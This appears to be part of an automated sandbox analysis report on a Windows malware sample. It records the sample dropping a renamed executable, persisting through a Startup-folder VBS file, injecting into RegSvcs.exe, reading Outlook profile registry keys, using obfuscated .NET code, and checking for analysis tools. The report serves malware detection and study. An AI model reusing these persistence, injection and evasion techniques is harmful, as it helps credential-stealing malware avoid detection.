                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: ref_97024130865.exeStatic file information: File size 1112064 > 1048576
                  Source: ref_97024130865.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: ref_97024130865.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: ref_97024130865.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: ref_97024130865.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: ref_97024130865.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: ref_97024130865.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: ref_97024130865.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
                  Source: ref_97024130865.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: ref_97024130865.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: ref_97024130865.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: ref_97024130865.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: ref_97024130865.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD4B37 LoadLibraryA,GetProcAddress,0_2_00FD4B37
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF8945 push ecx; ret 0_2_00FF8958
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_005FC4C6 push A3005FBAh; retn 005Fh2_2_005FC50D
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00618945 push ecx; ret 2_2_00618958
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E21D push ecx; ret 3_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041BFCD pushad ; ret 3_2_0041BFCE
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'l1JqknvYEVpdi', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Users\user\Desktop\ref_97024130865.exeFile created: C:\Users\user\AppData\Local\juvenile\nonplacental.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbsJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FD48D7
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01055376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01055376
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_005F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_005F48D7
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00675376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00675376
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_00FF3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FF3187
                  Source: C:\Users\user\Desktop\ref_97024130865.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ref_97024130865.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeAPI/Special instruction interceptor: Address: 1793F04
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeAPI/Special instruction interceptor: Address: 1947F5C
                  Source: ref_97024130865.exe, 00000000.00000003.2053367845.0000000001572000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054377903.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2053413308.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054033542.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2055038344.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054703652.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000002.2063619740.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054204008.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054526373.0000000001596000.00000004.00000020.00020000.00000000.sdmp, ref_97024130865.exe, 00000000.00000003.2054746605.0000000001596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEJG6
